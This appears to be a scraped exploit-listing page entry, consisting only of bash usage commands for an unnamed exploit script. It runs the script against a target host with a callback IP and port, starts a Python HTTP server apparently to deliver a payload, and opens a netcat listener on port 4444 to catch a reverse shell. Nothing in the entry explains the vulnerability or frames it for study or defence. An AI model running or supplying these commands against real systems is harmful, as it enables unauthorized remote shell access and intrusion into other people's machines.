## https://sploitus.com/exploit?id=5E574119-E1AE-5937-8559-F030A9249CE3 ```bash python3 exploit.py --target https://10.10.11.49/ -i 127.0.0.1 -p 40056 python3 -m http.server 8000 nc -lvnp 4444 ```